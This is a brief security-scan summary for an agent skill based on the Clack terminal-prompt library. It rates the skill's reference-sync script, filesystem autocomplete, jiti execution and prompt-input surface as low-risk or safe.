The Agent Skills Directory

[EXTERNAL_DOWNLOADS] (LOW): The scripts/sync_references.sh script contains a git clone command targeting the official repository for the Clack library (https://github.com/bombshell-dev/clack.git). This is a maintenance script and does not pose a runtime risk to the user.
[DATA_EXPOSURE] (LOW): The references/source/prompts/path.ts file implements a filesystem navigation component. This allows the CLI to read directory contents and file names for autocomplete functionality. While this accesses the local filesystem, it is limited to metadata (filenames) and is the intended primary purpose of the component.
[DYNAMIC_EXECUTION] (SAFE): The examples use jiti for just-in-time execution of TypeScript files. This is standard developer tooling for the Node.js ecosystem and is used here in a controlled context for demonstration purposes.
[INDIRECT_PROMPT_INJECTION] (LOW): The skill provides tools for ingesting user input via terminal prompts. While this is a potential attack surface if the agent were to blindly execute output from these prompts, the library includes built-in validation mechanisms (as seen in text.ts and examples) to sanitize and constrain input.

clack